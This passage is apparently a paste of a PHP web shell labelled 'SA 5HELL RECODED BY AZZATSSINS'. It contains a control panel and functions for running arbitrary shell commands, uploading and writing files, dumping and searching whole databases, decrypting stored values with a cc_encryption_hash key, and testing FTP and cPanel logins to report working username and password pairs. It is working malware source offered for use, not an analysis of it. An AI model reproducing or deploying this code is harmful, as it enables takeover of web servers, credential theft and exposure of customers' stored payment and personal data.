  1600. <br /><br />
  1601. <table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >
  1602.  
  1603. <tr><td><form method='GET''>
  1604. Change dir : <br />
  1605. <input type='text' name='name' value='$dir' size='25' />
  1606. <input type='hidden'  name='dir' value='$dir' />
  1607.  
  1608. <input type='submit' value='Go' />
  1609. </form> </td>
  1610.  
  1611. <td style=\"float: left\">  <form method='POST' action='$pg?azzatssins=mkdir' >
  1612.  
  1613. Make dir :<br />
  1614. <input type='text' name='n4me' size='25' />
  1615. <input type='hidden'  name='dir' value='$dir' />
  1616. <input type='submit' value='Go' /></div>
  1617. </form></td></tr>
  1618.  
  1619.  
  1620. <tr><td><form method='post' action='$pg?azzatssins=rfile'>
  1621. read file : <br />
  1622. <input type='text' name='n4me' size='25' />
  1623. <input type='hidden'  name='dir' value='$dir' />
  1624. <input type='submit' value='Go' />
  1625. </form> </td>
  1626.  
  1627.  
  1628. <td style=\"float: left\">  <form method='post'  action='$pg?azzatssins=mkfile' >
  1629.  
  1630. Make file :<br />
  1631. <div style=\"text-align: right\">
  1632. <input type='text' name='n4me' size='25' />
  1633. <input type='hidden'  name='dir' value='$dir' />
  1634. <input type='submit' value='Go' /></div>
  1635. </form></td></tr>
  1636.  
  1637.  
  1638. <tr><td><form method='POST' action='$pg?azzatssins=cmd'>
  1639. Execute : <br />
  1640. <input type='text' name='n4me' size='25' />
  1641. <input type='hidden'  name='dir' value='$dir' />
  1642. <input type='submit' value='Go' />
  1643. </form> </td>
  1644. <b></b>
  1645.  
  1646.  
  1647. <td style=\"float: left\">
  1648. <form method='POST' enctype=\"multipart/form-data\" action='$pg?azzatssins=up' >
  1649. Upload file :<br />
  1650. <div style=\"text-align: right\">
  1651. <input type='file' name='upfile' value='Choose file' size='21' />
  1652. <input type='hidden'  name='dir' value='$dir' />
  1653. <input type='submit' value='Up' />
  1654. </form></td></tr>
  1655.  
  1656.  
  1657.  
  1658. </table>
  1659. </div>
  1660. ";
  1661. //////////////////////////////////////// exit :d //////////////////////////
  1662.  
  1663.  
  1664.  
  1665.  
  1666.  
  1667.  
  1668.  
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674.  
  1675.  
  1676.  
  1677.  
  1678.  
  1679.  
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685. function cmd($cfe)
  1686. {
  1687.  $res = '';
  1688.  if (!empty($cfe))
  1689.  {
  1690.   if(function_exists('exec'))
  1691.    {
  1692.     @exec($cfe,$res);
  1693.     $res = join("\n",$res);
  1694.    }
  1695.   elseif(function_exists('shell_exec'))
  1696.    {
  1697.     $res = @shell_exec($cfe);
  1698.    }
  1699.   elseif(function_exists('system'))
  1700.    {
  1701.     @ob_start();
  1702.     @system($cfe);
  1703.     $res = @ob_get_contents();
  1704.     @ob_end_clean();
  1705.    }
  1706.   elseif(function_exists('passthru'))
  1707.    {
  1708.     @ob_start();
  1709.     @passthru($cfe);
  1710.     $res = @ob_get_contents();
  1711.     @ob_end_clean();
  1712.    }
  1713.   elseif(@is_resource($f = @popen($cfe,"r")))
  1714.   {
  1715.    $res = "";
  1716.    while(!@feof($f)) { $res .= @fread($f,1024); }
  1717.    @pclose($f);
  1718.   }
  1719.  }
  1720.  return $res;
  1721. }
  1722.  
  1723. function sa($i)
  1724. {
  1725. return @str_repeat("&nbsp;",$i);
  1726. }
  1727.  
  1728.  
  1729.  
  1730. function decrypt ($string,$cc_encryption_hash)
  1731. {
  1732.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  1733.     $hash_key = _hash ($key);
  1734.     $hash_length = strlen ($hash_key);
  1735.     $string = base64_decode ($string);
  1736.     $tmp_iv = substr ($string, 0, $hash_length);
  1737.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  1738.     $iv = $out = '';
  1739.     $c = 0;
  1740.     while ($c < $hash_length)
  1741.     {
  1742.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  1743.         ++$c;
  1744.     }
  1745.  
  1746.     $key = $iv;
  1747.     $c = 0;
  1748.     while ($c < strlen ($string))
  1749.     {
  1750.         if (($c != 0 AND $c % $hash_length == 0))
  1751.         {
  1752.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  1753.         }
  1754.  
  1755.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  1756.         ++$c;
  1757.     }
  1758.  
  1759.     return $out;
  1760. }
  1761.  
  1762.  
  1763. function _hash ($string)
  1764. {
  1765.     $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
  1766.     $out = '';
  1767.     $c = 0;
  1768.     while ($c < strlen ($hash))
  1769.     {
  1770.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  1771.         $c += 2;
  1772.     }
  1773.     return $out;
  1774. }
  1775.  
  1776. function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
  1777. {
  1778.  
  1779.   $link = @mysql_connect($host,$user,$pass);
  1780.   @mysql_select_db($name,$link);
  1781.  
  1782.   //get all of the tables
  1783.   if($tables == '*')
  1784.   {
  1785.     $tables = array();
  1786.     $result = @mysql_query('SHOW TABLES');
  1787.     while($row = @mysql_fetch_row($result))
  1788.     {
  1789.       $tables[] = $row[0];
  1790.     }
  1791.   }
  1792.   else
  1793.   {
  1794.     $tables = is_array($tables) ? $tables : explode(',',$tables);
  1795.   }
  1796.  
  1797.   //cycle through
  1798.   foreach($tables as $table)
  1799.   {
  1800.     $result = mysql_query('SELECT * FROM '.$table);
  1801.     $num_fields = mysql_num_fields($result);
  1802.  
  1803.        $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
  1804.        $return.= "\n\n".$row2[1].";\n\n";
  1805.  
  1806.     for ($i = 0; $i < $num_fields; $i++)
  1807.     {
  1808.       while($row = mysql_fetch_row($result))
  1809.       {
  1810.         $return.= 'INSERT INTO '.$table.' VALUES(';
  1811.         for($j=0; $j<$num_fields; $j++)
  1812.         {
  1813.           $row[$j] = addslashes($row[$j]);
  1814.           $row[$j] = ereg_replace("\n","\\n",$row[$j]);
  1815.           if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
  1816.           if ($j<($num_fields-1)) { $return.= ','; }
  1817.         }
  1818.         $return.= ");\n";
  1819.       }
  1820.     }
  1821.     $return.="\n\n\n";
  1822.   }
  1823.  
  1824.   //save file
  1825.   $handle = @fopen($path,'w+');
  1826.   @fwrite($handle,$return);
  1827.   @fclose($handle);
  1828. }
  1829.  
  1830. function search($string){
  1831.     $q = mysql_query("SHOW TABLE STATUS");
  1832.     $data = array();
  1833.     while($table = mysql_fetch_array($q)){
  1834.         $query = "SELECT * FROM $table[Name]";
  1835.         $result = mysql_query($query);
  1836.         $row = @mysql_fetch_assoc($result);
  1837.         if(!$row){
  1838.             continue;
  1839.         }
  1840.         $columns = array_keys($row);
  1841.         $data[$table['Name']] = $columns;
  1842.     }
  1843.     $tables = array();
  1844.     foreach($data as $table=>$columns){
  1845.         $query = "SELECT * FROM `$table` WHERE ";
  1846.         foreach($columns as $key=>$column){
  1847.             if($key == 0){
  1848.                 $query .= "`$column` LIKE '%$string%'";
  1849.             }else{
  1850.                 $query .= " OR `$column` LIKE '%$string%'";
  1851.             }
  1852.         }
  1853.         $query = mysql_query($query);
  1854.         $result = mysql_num_rows($query);
  1855.         if($result > 0){
  1856.             $tables[] = $table;
  1857.         }
  1858.     }
  1859.     $founded = array();
  1860.     foreach($tables as $table){
  1861.         $columns = $data[$table];
  1862.         foreach($columns as $column){
  1863.             $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
  1864.             $query = mysql_query($query);
  1865.             $result = mysql_num_rows($query);
  1866.             if($result > 0){
  1867.                 $founded[] = array('table'=>$table,'column'=>$column);
  1868.             }
  1869.         }
  1870.     }
  1871.     return $founded;
  1872. }
  1873.  
  1874.     function cleandir($d){ // Function to clean up the $dir and $curdir variables
  1875.     $d = @realpath($d);
  1876.     $d = str_replace("\\\\", "\\", $d);
  1877.     $d = str_replace("////", "//", $d);
  1878.     return($d);
  1879. }
  1880.  
  1881. function wsoPermsColor($f) {
  1882.     if (!@is_readable($f))
  1883.         return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
  1884.     elseif (!@is_writable($f))
  1885.         return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
  1886.     else
  1887.         return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
  1888. }
  1889.  
  1890. function wsoPerms($p) {
  1891.     if (($p & 0xC000) == 0xC000)$i = 's';
  1892.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  1893.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  1894.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  1895.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  1896.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  1897.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  1898.     else $i = 'u';
  1899.     $i .= (($p & 0x0100) ? 'r' : '-');
  1900.     $i .= (($p & 0x0080) ? 'w' : '-');
  1901.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  1902.     $i .= (($p & 0x0020) ? 'r' : '-');
  1903.     $i .= (($p & 0x0010) ? 'w' : '-');
  1904.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  1905.     $i .= (($p & 0x0004) ? 'r' : '-');
  1906.     $i .= (($p & 0x0002) ? 'w' : '-');
  1907.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  1908.     return $i;
  1909. }
  1910.  
  1911. function perm($file)
  1912. {
  1913.  if(file_exists($file))
  1914.  {
  1915.   return @substr(@sprintf('%o', @fileperms($file)), -4);
  1916.  }
  1917.  else
  1918.  {
  1919.   return "????";
  1920.  }
  1921. }
  1922.  
  1923. function sa_download($path)
  1924.     {
  1925.     header('Content-Description: File Transfer');
  1926.     header('Content-Type: application/octet-stream');
  1927.     header('Content-Disposition: attachment; filename='.basename($path));
  1928.     header('Content-Transfer-Encoding: binary');
  1929.     header('Expires: 0');
  1930.     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  1931.     header('Pragma: public');
  1932.     header('Content-Length: ' . filesize($path));
  1933.     ob_clean();
  1934.     flush();
  1935.     readfile($path);
  1936.     exit;
  1937.     }
  1938.  
  1939.     function findit($mytext,$starttag,$endtag) {
  1940.  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
  1941.  $posRight = @stripos($mytext,$endtag,$posLeft+1);
  1942.  return  @substr($mytext,$posLeft,$posRight-$posLeft);
  1943. }
  1944.  
  1945. function MsSQL()
  1946. {
  1947.     if(@function_exists('mssql_connect'))
  1948.     {
  1949.         $msSQL = '<font color="red">ON</font>';
  1950.     }
  1951.     else
  1952.     {
  1953.         $msSQL = '<font color="green">OFF</font>';
  1954.     }
  1955.     return $msSQL;
  1956. }
  1957. function MySQL2()
  1958. {
  1959.     $mysql_try = @function_exists('mysql_connect');
  1960.     if($mysql_try)
  1961.     {
  1962.         $mysql = '<font color="red">ON</font>';
  1963.     }
  1964.     else
  1965.     {
  1966.         $mysql = '<font color="green">OFF</font>';
  1967.     }
  1968.     return $mysql;
  1969. }
  1970. function Gzip()
  1971. {
  1972.     if (@function_exists('gzencode'))
  1973.     {
  1974.         $gzip = '<font color="red">ON</font>';
  1975.     }
  1976.     else
  1977.     {
  1978.         $gzip = '<font color="green">OFF</font>';
  1979.     }
  1980.     return $gzip;
  1981. }
  1982. function MysqlI()
  1983. {
  1984.     if (@function_exists('mysqli_connect'))
  1985.     {
  1986.         $mysqli = '<font color="red">ON</font>';
  1987.     }
  1988.     else
  1989.     {
  1990.         $mysqli = '<font color="green">OFF</font>';
  1991.     }
  1992.     return $mysqli;
  1993. }
  1994. function MSQL()
  1995. {
  1996.     if (@function_exists('msql_connect'))
  1997.     {
  1998.         $mSql = '<font color="red">ON</font>';
  1999.     }
  2000.     else
  2001.     {
  2002.         $mSql = '<font color="green">OFF</font>';
  2003.     }
  2004.     return $mSql;
  2005. }
  2006. function PostgreSQL()
  2007. {
  2008.     if(@function_exists('pg_connect'))
  2009.     {
  2010.         $postgreSQL = '<font color="red">ON</font>';
  2011.     }
  2012.     else
  2013.     {
  2014.         $postgreSQL = '<font color="green">OFF</font>';
  2015.     }
  2016.     return $postgreSQL;
  2017. }
  2018.  
  2019. function Oracle()
  2020. {
  2021.     if(@function_exists('ocilogon'))
  2022.     {
  2023.         $oracle = '<font color="red">ON</font>';
  2024.     }
  2025.     else
  2026.     {
  2027.         $oracle = '<font color="green">OFF</font>';
  2028.     }
  2029.     return $oracle;
  2030. }
  2031.  
  2032.  
  2033. function RegisterGlobals()
  2034. {
  2035.     if(@ini_get('register_globals'))
  2036.     {
  2037.         $registerg= '<font color="red">ON</font>';
  2038.     }
  2039.     else
  2040.     {
  2041.         $registerg= '<font color="green">OFF</font>';
  2042.     }
  2043.     return $registerg;
  2044. }
  2045. function HardSize($size)
  2046. {
  2047.     if($size >= 1073741824)
  2048.     {
  2049.         $size = @round($size / 1073741824 * 100) / 100 . " GB";
  2050.     }
  2051.     elseif($size >= 1048576)
  2052.     {
  2053.         $size = @round($size / 1048576 * 100) / 100 . " MB";
  2054.     }
  2055.     elseif($size >= 1024)
  2056.     {
  2057.         $size = @round($size / 1024 * 100) / 100 . " KB";
  2058.     }
  2059.     else
  2060.     {
  2061.         $size = $size . " B";
  2062.     }
  2063.     return $size;
  2064. }
  2065. function Curl()
  2066. {
  2067.     if(extension_loaded('curl'))
  2068.     {
  2069.         $curl = '<font color="red">ON</font>';
  2070.     }
  2071.     else
  2072.     {
  2073.         $curl = '<font color="green">OFF</font>';
  2074.     }
  2075.     return $curl;
  2076. }
  2077.  
  2078. function magicQouts()
  2079. {
  2080.     $mag=get_magic_quotes_gpc();
  2081.     if (empty($mag))
  2082.     {
  2083.         $mag = '<font color="green">OFF</font>';
  2084.     }
  2085.     else
  2086.     {
  2087.         $mag= '<font color="red">ON</font>';
  2088.     }
  2089.     return $mag;
  2090. }
  2091.  
  2092. function openBaseDir()
  2093. {
  2094. $openBaseDir = @ini_get("open_basedir");
  2095. if (!$openBaseDir)
  2096.     {
  2097.         $openBaseDir = '<font color="green">OFF</font>';
  2098.     }
  2099.     else
  2100.     {
  2101.         $openBaseDir = '<font color="red">ON</font>';
  2102.     }
  2103.     return $openBaseDir;
  2104. }
  2105.  
  2106. function ftp_check($host,$user,$pass,$timeout){
  2107. $ch = curl_init();
  2108. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  2109. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2110. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  2111. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  2112. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  2113. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2114. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2115. $data = curl_exec($ch);
  2116. if ( curl_errno($ch) == 28 ) {
  2117.  
  2118. print "<b> Error : Connection timed out </b>";
  2119. exit;}
  2120.  
  2121. elseif ( curl_errno($ch) == 0 ){
  2122.  
  2123. print
  2124. "
  2125. <b>found username : <font color='#FF0000'> $user </font> - password :
  2126. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
  2127. exit;}
  2128.  
  2129.  
  2130. function cpanel_check($host,$user,$pass,$timeout){
  2131. $ch = curl_init();
  2132. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  2133. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2134. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  2135. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  2136. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  2137. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  2138. $data = curl_exec($ch);
  2139. if ( curl_errno($ch) == 28 ) {
  2140. print "<b> Error : Connection timed out</b>";
  2141. exit;}
  2142. elseif ( curl_errno($ch) == 0 ){
  2143.  
  2144. print
  2145. "
  2146. <b>found username : <font color='#FF0000'>$user</font> - password :
  2147. <font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
  2148. exit; }
  2149.  
  2150.  
  2151.         function op_sa($f,$t) {
  2152.             $w = @fopen($f,"w") or @function_exists('file_put_contents');
  2153.             if($w){
  2154.                 @fwrite($w,@base64_decode($t));
  2155.                 @fclose($w);
  2156.             }
  2157.         }
  2158.  
  2159.  
  2160.   echo "</td></tr></table></div>| <b class='foter'>SA 5HELL RECODED BY <font color=maroon>AZZATSSINS </a></b>|<b class='foter'> MY TWITTER : <a href='http://twitter.com/#!/AZZATSSINS'>@AZZATSSINS</a></b> | </html> ";
  2161.  
  2162.  
  2163.  
  2164. ?>
Add Comment
Please, Sign In to add comment